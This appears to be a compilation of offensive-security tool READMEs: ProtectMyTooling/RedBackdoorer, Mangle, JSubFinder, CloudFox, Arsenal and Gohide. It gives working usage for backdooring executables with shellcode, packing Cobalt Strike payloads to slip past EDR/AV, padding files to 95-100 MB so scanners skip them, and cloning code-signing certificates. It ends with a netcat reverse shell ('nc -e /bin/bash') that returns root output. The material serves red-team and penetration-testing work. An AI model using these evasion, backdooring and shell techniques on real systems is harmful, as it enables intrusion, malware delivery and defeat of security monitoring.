MMM "YMMMMMP" "YMMMMMP"""""YUMMMMM MMM YM `'YMUP"YMM

Red Team implants protection swiss knife.

Multi-Packer wrapping around multitude of packers, protectors, shellcode loaders, encoders.
Mariusz Banach / mgeeky '20-'22, <mb@binary-offensive.com>
v0.15

[.] Processing x64 file : beacon64.bin
[>] Generating output of sgn(<file>)...
[>] Generating output of backdoor(sgn(<file>))...
[>] Generating output of Amber(backdoor(sgn(<file>)))...

[+] SUCCEEDED. Original file size: 265959 bytes, new file size Amber(backdoor(sgn(<file>))): 1372672, ratio: 516.12%

Full RedBackdoorer usage:

cmd> py RedBackdoorer.py --help

β–ˆβ–ˆβ–€β–ˆβ–ˆβ–ˆ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–„
β–“β–ˆβ–ˆ β–’ β–ˆβ–ˆβ–“β–ˆ β–€β–’β–ˆβ–ˆβ–€ β–ˆβ–ˆβ–Œ
β–“β–ˆβ–ˆ β–‘β–„β–ˆ β–’β–ˆβ–ˆβ–ˆ β–‘β–ˆβ–ˆ β–ˆβ–Œ
β–’β–ˆβ–ˆβ–€β–€β–ˆβ–„ β–’β–“β–ˆ β–„β–‘β–“β–ˆβ–„ β–Œ
β–‘β–ˆβ–ˆβ–“ β–’β–ˆβ–ˆβ–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–“
β–‘ β–’β–“ β–‘β–’β–“β–‘β–‘ β–’β–‘ β–‘β–’β–’β–“ β–’
β–‘β–’ β–‘ β–’β–‘β–‘ β–‘ β–‘β–‘ β–’ β–’
β–‘β–‘ β–‘ β–‘ β–‘ β–‘ β–‘
β–„β–„β–„β–„ β–„β–„β–„β–‘ β–‘ β–„β–ˆβ–ˆβ–ˆβ–ˆβ–„ β–ˆβ–ˆ β–„β–ˆβ–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–„ β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–’β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–€β–ˆβ–ˆβ–ˆ β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–€β–ˆβ–ˆβ–ˆ
β–“β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–„β–’β–ˆβ–ˆβ–ˆβ–ˆβ–„ β–‘β–’β–ˆβ–ˆβ–€ β–€β–ˆ β–ˆβ–ˆβ–„β–ˆβ–’β–’β–ˆβ–ˆβ–€ β–ˆβ–ˆβ–’β–ˆβ–ˆβ–’ β–ˆβ–ˆβ–’β–ˆβ–ˆβ–’ β–ˆβ–ˆβ–“β–ˆβ–ˆ β–’ β–ˆβ–ˆβ–“β–ˆ β–€β–“β–ˆβ–ˆ β–’ β–ˆβ–ˆβ–’
β–’β–ˆβ–ˆβ–’ β–„β–ˆβ–’β–ˆβ–ˆ β–€β–ˆβ–„ β–’β–“β–ˆ β–„β–“β–ˆβ–ˆβ–ˆβ–„β–‘β–‘β–ˆβ–ˆ β–ˆβ–’β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–’β–ˆβ–ˆβ–‘ β–ˆβ–ˆβ–“β–ˆβ–ˆ β–‘β–„β–ˆ β–’β–ˆβ–ˆβ–ˆ β–“β–ˆβ–ˆ β–‘β–„β–ˆ β–’
β–’β–ˆβ–ˆβ–‘β–ˆβ–€ β–‘β–ˆβ–ˆβ–„β–„β–„β–„β–ˆβ–ˆβ–’β–“β–“β–„ β–„β–ˆβ–ˆβ–“β–ˆβ–ˆ β–ˆβ–„β–‘β–“β–ˆβ–„ β–’β–ˆβ–ˆ β–ˆβ–ˆβ–’β–ˆβ–ˆ β–ˆβ–ˆβ–’β–ˆβ–ˆβ–€β–€β–ˆβ–„ β–’β–“β–ˆ β–„β–’β–ˆβ–ˆβ–€β–€β–ˆβ–„
β–‘β–“β–ˆ β–€β–ˆβ–“β–“β–ˆ β–“β–ˆβ–ˆβ–’ β–“β–ˆβ–ˆβ–ˆβ–€ β–’β–ˆβ–ˆβ–’ β–ˆβ–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–“β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–“β–’ β–‘ β–ˆβ–ˆβ–ˆβ–ˆβ–“β–’β–‘β–ˆβ–ˆβ–“ β–’β–ˆβ–ˆβ–‘β–’β–ˆβ–ˆβ–ˆβ–ˆβ–‘β–ˆβ–ˆβ–“ β–’β–ˆβ–ˆβ–’
β–‘β–’β–“β–ˆβ–ˆβ–ˆβ–€β–’β–’β–’ β–“β–’β–ˆβ–‘ β–‘β–’ β–’ β–’ β–’β–’ β–“β–’β–’β–’β–“ β–’β–‘ β–’β–‘β–’β–‘β–’β–‘β–‘ β–’β–‘β–’β–‘β–’β–‘β–‘ β–’β–“ β–‘β–’β–“β–‘β–‘ β–’β–‘ β–‘ β–’β–“ β–‘β–’β–“β–‘
β–’β–‘β–’ β–‘ β–’ β–’β–’ β–‘ β–‘ β–’ β–‘ β–‘β–’ β–’β–‘β–‘ β–’ β–’ β–‘ β–’ β–’β–‘ β–‘ β–’ β–’β–‘ β–‘β–’ β–‘ β–’β–‘β–‘ β–‘ β–‘ β–‘β–’ β–‘ β–’β–‘
β–‘ β–‘ β–‘ β–’ β–‘ β–‘ β–‘β–‘ β–‘ β–‘ β–‘ β–‘β–‘ β–‘ β–‘ β–’ β–‘ β–‘ β–‘ β–’ β–‘β–‘ β–‘ β–‘ β–‘β–‘ β–‘
β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘ β–‘
β–‘ β–‘ β–‘


Your finest PE backdooring companion.
Mariusz Banach / mgeeky '22, (@mariuszbit)
<mb@binary-offensive.com>

usage: RedBackdoorer.py [options] <mode> <shellcode> <infile>

options:
-h, --help show this help message and exit

Required arguments:
mode PE Injection mode, see help epilog for more details.
shellcode Input shellcode file
infile PE file to backdoor

Optional arguments:
-o PATH, --outfile PATH
Path where to save output file with watermark injected. If not given, will modify infile.
-v, --verbose Verbose mode.

Backdooring options:
-n NAME, --section-name NAME
If shellcode is to be injected into a new PE section, define that section name. Section name must not be longer than 7 characters. Default: .qcsw
-i IOC, --ioc IOC Append IOC watermark to injected shellcode to facilitate implant tracking.

Authenticode signature options:
-r, --remove-signature
Remove PE Authenticode digital signature since its going to be invalidated anyway.

------------------

PE Backdooring <mode> consists of two comma-separated options.
First one denotes where to store shellcode, second how to run it:

<mode>

save,run
| |
| +---------- 1 - change AddressOfEntryPoint
| 2 - hijack branching instruction at Original Entry Point (jmp, call, ...)
| 3 - setup TLS callback
|
+-------------- 1 - store shellcode in the middle of a code section
2 - append shellcode to the PE file in a new PE section
Example:

py RedBackdoorer.py 1,2 beacon.bin putty.exe putty-infected.exe

Cobalt Strike Integration

There is also a script that integrates ProtectMyTooling.py, using it as a wrapper around the configured PE/.NET packers/protectors in order to easily transform input executables into their protected and compressed output forms and then upload or use them from within Cobalt Strike.

The idea is to have an automated process of protecting all of the uploaded binaries or .NET assemblies used by execute-assembly, and to forget about protecting or obfuscating them manually before each usage. The added benefit of automatically transforming executables is that the same executable is protected anew each time it's used, resulting in unique samples launched on target machines. That should nicely deceive enterprise-wide EDR/AV IOC sweeps looking for the same artefact on different machines.

Additionally, the protected-execute-assembly command is able to look for assemblies of which only the name was given in a preconfigured assemblies directory (set in the dotnet_assemblies_directory setting).

To use it:

  1. Load CobaltStrike/ProtectMyTooling.cna in your Cobalt Strike.
  2. Go to the menu and setup all the options

  3. Then in your Beacon's console you'll have the following commands available:
  • protected-execute-assembly - Executes a local, previously protected and compressed .NET program in-memory on target.
  • protected-upload - Takes an input file, protects it if its PE executable and then uploads that file to specified remote location.

Basically these commands open the input files and pass them first to the CobaltStrike/cobaltProtectMyTooling.py script, which in turn calls out to ProtectMyTooling.py. As soon as the binary gets obfuscated, it is passed to your beacon for execution/uploading.
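
For illustration only, and assuming the syntax mirrors the built-in execute-assembly and upload commands (the paths and arguments below are hypothetical):

beacon> protected-execute-assembly C:\Tools\Rubeus.exe triage
beacon> protected-upload C:\Tools\implant.exe C:\Windows\Temp\svchost.exe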

Cobalt Strike related Options

Here's a list of options required by the Cobalt Strike integrator:

  • python3_interpreter_path - Specify a path to Python3 interpreter executable
  • protect_my_tooling_dir - Specify a path to ProtectMyTooling main directory
  • protect_my_tooling_config - Specify a path to ProtectMyTooling configuration file with various packers options
  • dotnet_assemblies_directory - Specify local path .NET assemblies should be looked for if not found by execute-assembly
  • cache_protected_executables - Enable to cache already protected executables and reuse them when needed
  • protected_executables_cache_dir - Specify a path to a directory that should store cached protected executables
  • default_exe_x86_packers_chain - Native x86 EXE executables protectors/packers chain
  • default_exe_x64_packers_chain - Native x64 EXE executables protectors/packers chain
  • default_dll_x86_packers_chain - Native x86 DLL executables protectors/packers chain
  • default_dll_x64_packers_chain - Native x64 DLL executables protectors/packers chain
  • default_dotnet_packers_chain - .NET executables protectors/packers chain

Known Issues

  • ScareCrow is very tricky to run from Windows. What worked for me is the following:
    1. Run on Windows 10 and have WSL installed (bash.exe command available in Windows)
    2. Have golang installed in WSL at version 1.16+ (tested on 1.18)
    3. Make sure to have PackerScareCrow.Run_ScareCrow_On_Windows_As_WSL = True set

Credits due & used technology

  • All packer, obfuscator, converter and loader credits go to their authors. This tool is merely a wrapper around their technology!

    • Hopefully none of them mind me adding such wrappers. Should there be concerns - please reach out to me.
  • ProtectMyTooling also uses denim.exe by moloch-- for some Nim-based packers.


TODO

  • Write custom PE injector and offer it as a "protector"
  • Add watermarking to other file formats such as Office documents, WSH scripts (VBS, JS, HTA) and containers
  • Add support for a few other Packers/Loaders/Generators in upcoming future:

Disclaimer

Use of this tool, as well as any other projects I'm the author of, for illegal purposes, unsolicited hacking or cyber-espionage is strictly prohibited. This and other tools I distribute help professional Penetration Testers, Security Consultants, Security Engineers and other security personnel improve their customers' network cyber-defence capabilities.
In no event shall the authors or copyright holders be liable for any claim, damages or other liability arising from illegal use of this software.

If there are concerns, copyright issues, threats posed by this software or other inquiries - I am open to collaborate in responsibly addressing them.

The tool exposes a handy interface for using mostly open-source or commercially available packers/protectors/obfuscation software, therefore not introducing any immediately new threats to the cyber-security landscape as is.


β˜•Show Supportβ˜•

This and other projects are the outcome of sleepless nights and plenty of hard work. If you like what I do and appreciate that I always give back to the community, consider buying me a coffee (or better, a beer) just to say thank you!


Author

   Mariusz Banach / mgeeky, '20-'22
<mb [at] binary-offensive.com>
(https://github.com/mgeeky)


Mangle - Tool That Manipulates Aspects Of Compiled Executables (.Exe Or DLL) To Avoid Detection From EDRs


Authored By Tyl0us

Featured at Source Zero Con 2022

Mangle is a tool that manipulates aspects of compiled executables (.exe or DLL). Mangle can remove known Indicators of Compromise (IoC) based strings and replace them with random characters, change the file by inflating the size to avoid EDRs, and can clone code-signing certs from legitimate files. In doing so, Mangle helps loaders evade on-disk and in-memory scanners.


Contributing

Mangle was developed in Golang.

Install

The first step, as always, is to clone the repo. Before you compile Mangle, you'll need to install the dependencies. To install them, run the following commands:

go get github.com/Binject/debug/pe

Then build it

go build Mangle.go

Important

While Mangle is written in Golang, a lot of the features are designed to work on executable files from other languages. At the time of release, the only feature that is Golang specific is the string manipulation part.

Usage

./mangle -h

_____ .__
/ \ _____ ____ ____ | | ____
/ \ / \\__ \ / \ / ___\| | _/ __ \
/ Y \/ __ \| | \/ /_/ > |_\ ___/
\____|__ (____ /___| /\___ /|____/\___ >
\/ \/ \//_____/ \/
(@Tyl0us)
Usage of ./Mangle:
-C string
Path to the file containing the certificate you want to clone
-I string
Path to the orginal file
-M Edit the PE file to strip out Go indicators
-O string
The new file name
-S int
How many MBs to increase the file by

Strings

Mangle takes the input executable and looks for known strings that security products look for or alert on. These strings alone are not the sole point of detection; often, they are used in conjunction with other data points and pieces of telemetry for detection and prevention. Mangle finds these known strings and replaces the hex values with random ones to remove them. IMPORTANT: Mangle replaces the exact size of the strings it's manipulating. It doesn't add any more or any less, as this would create misalignments and instabilities in the file. Mangle does this using the -M command-line option.
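
For example, a run that only strips the Go indicators might look like this (file names are illustrative; -I, -M and -O are the flags listed in the usage above):

./Mangle -I beacon.exe -M -O beacon_mangled.exe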

Currently, Mangle only handles Golang files, but other languages will be added over time. If you know of known strings for other languages, please open an issue ticket and submit them.

Before


After


Inflate

Pretty much all EDRs can't scan files beyond a certain size, whether on disk or in memory. This simply stems from the fact that large files take longer to review, scan, or monitor, and EDRs do not want to impact performance by slowing down the user's productivity. Mangle inflates files by creating a padding of null bytes (zeros) at the end of the file, which ensures that nothing inside the file is impacted. To inflate an executable, use the -S command-line option along with the number of megabytes you want to add to the file. Large payloads are not really an issue anymore given how fast Internet speeds are; that being said, it's not recommended to make a 2 GB file.

Based on test cases across numerous userland and kernel EDRs, it is recommended to increase the size by 95-100 megabytes. Because vendors do not check large files, the activity goes unnoticed, resulting in the successful execution of shellcode.

Example:
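
A hypothetical invocation following the 95-100 MB recommendation above (file names are illustrative):

./Mangle -I loader.exe -S 95 -O loader_inflated.exe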


Certificate

Mangle also contains the ability to take the full chain and all attributes from a legitimate code-signing certificate from a file and copy it onto another file. This includes the signing date, counter signatures, and other measurable attributes.

While this feature may sound similar to another tool I developed, Limelighter, the major difference between the two is that Limelighter makes a fake certificate based off a domain and signs it with the current date and time, whereas Mangle uses valid attributes whose timestamps are taken from the original file. This option can copy from DLL or .exe files; use the -C command-line option along with the path to the file you want to copy the certificate from.
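
A hypothetical invocation, cloning the certificate chain from a legitimately signed binary (file names are illustrative):

./Mangle -I payload.exe -C signed-original.exe -O payload_signed.exe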


Credit

  • Special thanks to Jessica of SuperNovasStore for creating the logo.
  • Special thanks to Binject for his repo


JSubFinder - Searches Webpages For Javascript And Analyzes Them For Hidden Subdomains And Secrets


JSubFinder is a tool written in Golang to search webpages & JavaScript for hidden subdomains and secrets in the given URL. Developed with bug bounty hunters in mind, JSubFinder takes advantage of Go's amazing performance, allowing it to utilize large data sets & be easily chained with other tools.


Install

Install the application and download the signatures needed to find secrets

Using GO:

go get github.com/ThreatUnkown/jsubfinder
wget https://raw.githubusercontent.com/ThreatUnkown/jsubfinder/master/.jsf_signatures.yaml && mv .jsf_signatures.yaml ~/.jsf_signatures.yaml

or

Downloads Page

Basic Usage

Search

Search the given URLs for subdomains and secrets

$ jsubfinder search -h

Execute the command specified

Usage:
JSubFinder search [flags]

Flags:
-c, --crawl Enable crawling
-g, --greedy Check all files for URL's not just Javascript
-h, --help help for search
-f, --inputFile string File containing domains
-t, --threads int Ammount of threads to be used (default 5)
-u, --url strings Url to check

Global Flags:
-d, --debug Enable debug mode. Logs are stored in log.info
-K, --nossl Skip SSL cert verification (default true)
-o, --outputFile string name/location to store the file
-s, --secrets Check results for secrets e.g api keys
--sig string Location of signatures for finding secrets
-S, --silent Disable printing to the console

Examples (results are the same in this case):

$ jsubfinder search -u www.google.com
$ jsubfinder search -f file.txt
$ echo www.google.com | jsubfinder search
$ echo www.google.com | httpx --silent | jsubfinder search

apis.google.com
ogs.google.com
store.google.com
mail.google.com
accounts.google.com
www.google.com
policies.google.com
support.google.com
adservice.google.com
play.google.com

With Secrets Enabled

Note: --secrets="" will save the secret results in a secrets.txt file

$ echo www.youtube.com | jsubfinder search --secrets=""
www.youtube.com
youtubei.youtube.com
payments.youtube.com
2Fwww.youtube.com
252Fwww.youtube.com
m.youtube.com
tv.youtube.com
music.youtube.com
creatoracademy.youtube.com
artists.youtube.com

Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com
Google Cloud API Key <redacted> found in content of https://www.youtube.com

Advanced examples

$ echo www.google.com | jsubfinder search -crawl -s "google_secrets.txt" -S -o jsf_google.txt -t 10 -g
  • -crawl use the default crawler to crawl pages for other URL's to analyze
  • -s enables JSubFinder to search for secrets
  • -S Silence output to console
  • -o <file> save output to specified file
  • -t 10 use 10 threads
  • -g search every URL for JS, even ones we don't think have any

Proxy

Enables an upstream HTTP proxy with TLS MITM support. This allows you to:

  1. Browse sites in real time and have JSubFinder search for subdomains and secrets in real time.
  2. If needed, run JSubFinder on another server to offload the workload
$ JSubFinder proxy -h

Execute the command specified

Usage:
JSubFinder proxy [flags]

Flags:
-h, --help help for proxy
-p, --port int Port for the proxy to listen on (default 8444)
--scope strings Url's in scope seperated by commas. e.g www.google.com,www.netflix.com
-u, --upstream-proxy string Adress of upsteam proxy e.g http://127.0.0.1:8888 (default "http://127.0.0.1:8888")

Global Flags:
-d, --debug Enable debug mode. Logs are stored in log.info
-K, --nossl Skip SSL cert verification (default true)
-o, --outputFile string name/location to store the file
-s, --secrets Check results for secrets e.g api keys
--sig string Location of signatures for finding secrets
-S, --silent Disable printing to the console
$ jsubfinder proxy
Proxy started on :8444
Subdomain: out.reddit.com
Subdomain: www.reddit.com
Subdomain: 2Fwww.reddit.com
Subdomain: alb.reddit.com
Subdomain: about.reddit.com

With Burp Suite

  1. Configure Burp Suite to forward traffic to an upstream proxy (User Options > Connections > Upstream Proxy Servers > Add)
  2. Run JSubFinder in proxy mode

Burp Suite will now forward all traffic proxied through it to JSubFinder. JSubFinder will retrieve the response, return it to Burp and, in another thread, search for subdomains and secrets.

With Proxify

  1. Launch Proxify & dump traffic to a folder proxify -output logs
  2. Configure Burp Suite, a Browser or other tool to forward traffic to Proxify (see instructions on their github page)
  3. Launch JSubFinder in proxy mode & set the upstream proxy as Proxify jsubfinder proxy -u http://127.0.0.1:8443
  4. Use Proxify's replay utility to replay the dumped traffic to jsubfinder replay -output logs -burp-addr http://127.0.0.1:8444

Run on another server

Simple: run JSubFinder in proxy mode on another server, e.g. 192.168.1.2 (see the example below). Follow the proxy steps above but set your application's upstream proxy to 192.168.1.2:8443.
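
For example, on the remote server (the -p flag is documented in the proxy usage above):

$ jsubfinder proxy -p 8443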

Advanced Examples

$ jsubfinder proxy --scope www.reddit.com -p 8081 -S -o jsf_reddit.txt
  • --scope limits JSubFinder to only analyze responses from www.reddit.com
  • -p port JSubFinders proxy server is running on
  • -S silence output to the console/stdout
  • -o <file> output examples to this file


Cloudfox - Automating Situational Awareness For Cloud Penetration Tests


CloudFox helps you gain situational awareness in unfamiliar cloud environments. It’s an open source command line tool created to help penetration testers and other offensive security professionals find exploitable attack paths in cloud infrastructure.

CloudFox helps you answer the following common questions (and many more):

  • What regions is this AWS account using and roughly how many resources are in the account?
  • What secrets are lurking in EC2 userdata or service specific environment variables?
  • What actions/permissions does this [principal] have?
  • What role trusts are overly permissive or allow cross-account assumption?
  • What endpoints/hostnames/IPs can I attack from an external starting point (public internet)?
  • What endpoints/hostnames/IPs can I attack from an internal starting point (assumed breach within the VPC)?
  • What filesystems can I potentially mount from a compromised resource inside the VPC?

Quick Start

CloudFox is modular (you can run one command at a time), but there is an aws all-checks command that will run the other aws commands for you with sane defaults:

cloudfox aws --profile [profile-name] all-checks

CloudFox is designed to be executed by a principal with limited read-only permissions, but its purpose is to help you find attack paths that can be exploited in simulated compromise scenarios (aka objective-based penetration testing).

For the full documentation please refer to our wiki.

Supported Cloud Providers

Provider CloudFox Commands
AWS 15
Azure 2 (alpha)
GCP Support Planned
Kubernetes Support Planned

Install

Option 1: Download the latest binary release for your platform.

Option 2: Install Go, clone the CloudFox repository and compile from source

# git clone https://github.com/BishopFox/cloudfox.git
...omitted for brevity...
# cd ./cloudfox
# go build .
# ./cloudfox

Prerequisites

AWS

  • AWS CLI installed
  • Supports AWS profiles, AWS environment variables, or metadata retrieval (on an ec2 instance)
  • A principal with the recommended policies attached (described below)
  • Recommended attached policies: SecurityAudit + CloudFox custom policy

Additional policy notes (as of 09/2022):

Policy Notes
CloudFox custom policy Has a complete list of every permission cloudfox uses and nothing else
arn:aws:iam::aws:policy/SecurityAudit Covers most cloudfox checks but is missing newer services or permissions like apprunner:*, grafana:*, lambda:GetFunctionURL, lightsail:GetContainerServices
arn:aws:iam::aws:policy/job-function/ViewOnlyAccess Covers most cloudfox checks but is missing newer services or permissions like AppRunner:*, grafana:*, lambda:GetFunctionURL, lightsail:GetContainerServices - and is also missing iam:SimulatePrincipalPolicy.
arn:aws:iam::aws:policy/ReadOnlyAccess Only missing AppRunner, but also grants things like "s3:Get*" which can be overly permissive.
arn:aws:iam::aws:policy/AdministratorAccess This will work just fine with CloudFox, but if you were handed this level of access as a penetration tester, that should probably be a finding in itself :)

Azure

  • Viewer or similar permissions applied.

Supported Commands

Provider Command Name Description
AWS all-checks Run all of the other commands using reasonable defaults. You'll still want to check out the non-default options of each command, but this is a great place to start.
AWS access-keys Lists active access keys for all users. Useful for cross referencing a key you found with which in-scope account it belongs to.
AWS buckets Lists the buckets in the account and gives you handy commands for inspecting them further.
AWS ecr List the most recently pushed image URI from all repositories. Use the loot file to pull selected images down with docker/nerdctl for inspection.
AWS endpoints Enumerates endpoints from various services. Scan these endpoints from both an internal and external position to look for things that don't require authentication, are misconfigured, etc.
AWS env-vars Grabs the environment variables from services that have them (App Runner, ECS, Lambda, Lightsail containers, and Sagemaker are supported). If you find a sensitive secret, use cloudfox iam-simulator AND pmapper to see who has access to them.
AWS filesystems Enumerate the EFS and FSx filesystems that you might be able to mount without creds (if you have the right network access). For example, this is useful when you have ec2:RunInstances but not iam:PassRole.
AWS iam-simulator Like pmapper, but uses the IAM policy simulator. It uses AWS's evaluation logic, but notably, it doesn't consider transitive access via privesc, which is why you should always also use pmapper.
AWS instances Enumerates useful information for EC2 Instances in all regions like name, public/private IPs, and instance profiles. Generates loot files you can feed to nmap and other tools for service enumeration.
AWS inventory Gain a rough understanding of size of the account and preferred regions.
AWS outbound-assumed-roles List the roles that have been assumed by principals in this account. This is an excellent way to find outbound attack paths that lead into other accounts.
AWS permissions Enumerates IAM permissions associated with all users and roles. Grep this output to figure out what permissions a particular principal has rather than logging into the AWS console and painstakingly expanding each policy attached to the principal you are investigating.
AWS principals Enumerates IAM users and Roles so you have the data at your fingertips.
AWS role-trusts Enumerates IAM role trust policies so you can look for overly permissive role trusts or find roles that trust a specific service.
AWS route53 Enumerate all records from all route53 managed zones. Use this for application and service enumeration.
AWS secrets List secrets from SecretsManager and SSM. Look for interesting secrets in the list and then see who has access to them using cloudfox iam-simulator and/or pmapper.
Azure instances-map Enumerates useful information for Compute instances in all available resource groups and subscriptions
Azure rbac-map Enumerates Role Assignments for all tenants
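
Individual modules can also be run on their own using the same profile syntax shown in the Quick Start; for example (module names are taken from the table above):

cloudfox aws --profile [profile-name] secrets
cloudfox aws --profile [profile-name] instances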

Authors

Contributing

Wiki - How to Contribute

TODO

  • AWS - Add support for GovCloud and China regions
  • AWS - Add support for hardcoded region (which would override the default of looking in every region)

FAQ

How does CloudFox compare with ScoutSuite, Prowler, Steampipe's AWS Compliance Module, AWS Security Hub, etc.?

CloudFox doesn't create any alerts or findings, and doesn't check your environment for compliance to a baseline or benchmark. Instead, it simply enables you to be more efficient during your manual penetration testing activities. It gives you the information you'll likely need to validate whether an attack path is possible or not.

Why do I see errors in some CloudFox commands?

  • Services that don't exist in all regions - CloudFox currently makes the same API calls to every region. However, not all regions support all services. For instance, services like Appstream and AWS Grafana are only supported in a subset of the total regions. In the future, we plan to make CloudFox aware of which services run in each region.
  • You don't have permission - Another reason you might see errors is that you don't have permission to make the calls that CloudFox is making, either because the policy doesn't allow it (e.g., SecurityAudit doesn't allow all of the permissions CloudFox needs) or because an SCP is blocking you.

You can always look in the ~/.cloudfox/cloudfox-error.log file to get more information on errors.

Prior work and other related projects

  • SmogCloud - Inspiration for the endpoints command
  • SummitRoute's AWS Exposable Resources - Inspiration for the endpoints command
  • Steampipe - We used steampipe to prototype many cloudfox commands. While CloudFox is laser focused on helping cloud penetration testers, steampipe is an easy way to query any and all of your cloud resources.
  • Principal Mapper - Inspiration for, and a strongly recommended partner to the iam-simulator command
  • Cloudsplaining - Inspiration for the permissions command
  • ScoutSuite - Excellent cloud security benchmark tool. Provided inspiration for the --userdata functionality in the instances command, the permissions command, and many others
  • Prowler - Another excellent cloud security benchmark tool.
  • Pacu - Excellent cloud penetration testing tool. PACU has quite a few enumeration commands similar to CloudFox, and lots of other commands that automate exploitation tasks (something that CloudFox avoids by design)
  • CloudMapper - Inspiration for the inventory command and just generally CloudFox as a whole


Arsenal - Recon Tool installer



Arsenal is a simple shell script (Bash) used to install the most important tools and requirements for your environment, saving you the time of installing all these tools one by one.


Tools in Arsenal

Name description
Amass The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques
ffuf A fast web fuzzer written in Go
dnsX Fast and multi-purpose DNS toolkit allow to run multiple DNS queries
meg meg is a tool for fetching lots of URLs but still being 'nice' to servers
gf A wrapper around grep to avoid typing common patterns
XnLinkFinder This is a tool used to discover endpoints crawling a target
httpX httpx is a fast and multi-purpose HTTP toolkit allow to run multiple probers using retryablehttp library, it is designed to maintain the result reliability with increased threads
Gobuster Gobuster is a tool used to brute-force (DNS,Open Amazon S3 buckets,Web Content)
Nuclei Nuclei tool is Golang Language-based tool used to send requests across multiple targets based on nuclei templates leading to zero false positive or irrelevant results and provides fast scanning on various host
Subfinder Subfinder is a subdomain discovery tool that discovers valid subdomains for websites by using passive online sources. It has a simple modular architecture and is optimized for speed. subfinder is built for doing one thing only - passive subdomain enumeration, and it does that very well
Naabu Naabu is a port scanning tool written in Go that allows you to enumerate valid ports for hosts in a fast and reliable manner. It is a really simple tool that does fast SYN/CONNECT scans on the host/list of hosts and lists all ports that return a reply
assetfinder Find domains and subdomains potentially related to a given domain
httprobe Take a list of domains and probe for working http and https servers
knockpy Knockpy is a python3 tool designed to quickly enumerate subdomains on a target domain through dictionary attack
waybackurl fetch known URLs from the Wayback Machine for *.domain and output them on stdout
Logsensor A Powerful Sensor Tool to discover login panels, and POST Form SQLi Scanning
Subzy Subdomain takeover tool which works based on matching response fingerprints from can-i-take-over-xyz
Xss-strike Advanced XSS Detection Suite
Altdns Subdomain discovery through alterations and permutations
Nosqlmap NoSQLMap is an open source Python tool designed to audit for as well as automate injection attacks and exploit default configuration weaknesses in NoSQL databases and web applications using NoSQL in order to disclose or clone data from the database
ParamSpider Parameter miner for humans
GoSpider GoSpider - Fast web spider written in Go
eyewitness EyeWitness is a Python tool written by @CptJesus and @christruncer. Its goal is to help you efficiently assess what assets of your target to look into first.
CRLFuzz A fast tool to scan CRLF vulnerability written in Go
DontGO403 dontgo403 is a tool to bypass 40X errors
Chameleon Chameleon provides better content discovery by using wappalyzer's set of technology fingerprints alongside custom wordlists tailored to each detected technologies
uncover uncover is a go wrapper using APIs of well known search engines to quickly discover exposed hosts on the internet. It is built with automation in mind, so you can query it and utilize the results with your current pipeline tools
wpscan WordPress Security Scanner

Requirements in Arsenal

  • Python3
  • Git
  • Ruby
  • Wget
  • GO-Lang
  • Rust

Go-lang installation

sudo apt-get remove -y golang-go
sudo rm -rf /usr/local/go
wget https://go.dev/dl/go1.19.1.linux-amd64.tar.gz
sudo tar -xvf go1.19.1.linux-amd64.tar.gz
sudo mv go /usr/local
# add the following lines to /etc/profile (or ~/.profile):
export GOPATH=$HOME/go
export PATH=$PATH:/usr/local/go/bin
export PATH=$PATH:$GOPATH/bin
source /etc/profile   # to update your shell

How to install

git clone https://github.com/Micro0x00/Arsenal.git
cd Arsenal
sudo chmod +x Arsenal.sh
sudo ./Arsenal.sh




Gohide - Tunnel Port To Port Traffic Over An Obfuscated Channel With AES-GCM Encryption


Tunnel port to port traffic via an obfuscated channel with AES-GCM encryption.

Obfuscation Modes

  • Session Cookie HTTP GET (http-client)
  • Set-Cookie Session Cookie HTTP/2 200 OK (http-server)
  • WebSocket Handshake "Sec-WebSocket-Key" (websocket-client)
  • WebSocket Handshake "Sec-WebSocket-Accept" (websocket-server)
  • No obfuscation, just use AES-GCM encrypted messages (none)

AES-GCM is enabled by default for each of the options above.


Usage

root@WOPR-KALI:/opt/gohide-dev# ./gohide -h
Usage of ./gohide:
-f string
listen fake server -r x.x.x.x:xxxx (ip/domain:port) (default "0.0.0.0:8081")
-key openssl passwd -1 -salt ok | md5sum
aes encryption secret: use '-k openssl passwd -1 -salt ok | md5sum' to derive key from password (default "5fe10ae58c5ad02a6113305f4e702d07")
-l string
listen port forward -l x.x.x.x:xxxx (ip/domain:port) (default "127.0.0.1:8080")
-m string
obfuscation mode (AES encrypted by default): websocket-client, websocket-server, http-client, http-server, none (default "none")
-pem string
path to .pem for TLS encryption mode: default = use hardcoded key pair 'CN:target.com', none = plaintext mode (default "default")
-r string
forward to remote fake server -r x.x.x.x:xxxx (ip/domain:port) (default "127.0.0.1:9999")

Scenario

Box A - Reverse Handler.

root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:8081 -l 127.0.0.1:8080 -r target.com:9091 -m websocket-client
Local Port Forward Listening: 127.0.0.1:8080
FakeSrv Listening: 0.0.0.0:8081

Box B - Target.

root@WOPR-KALI:/opt/gohide# ./gohide -f 0.0.0.0:9091 -l 127.0.0.1:9090 -r target.com:8081 -m websocket-server
Local Port Forward Listening: 127.0.0.1:9090
FakeSrv Listening: 0.0.0.0:9091

Note: /etc/hosts "127.0.0.1 target.com"

Box B - Netcat /bin/bash

root@WOPR-KALI:/var/tmp# nc -e /bin/bash 127.0.0.1 9090

Box A - Netcat client

root@WOPR-KALI:/opt/gohide# nc -v 127.0.0.1 8080
localhost [127.0.0.1] 8080 (http-alt) open
id
uid=0(root) gid=0(root) groups=0(root)
uname -a
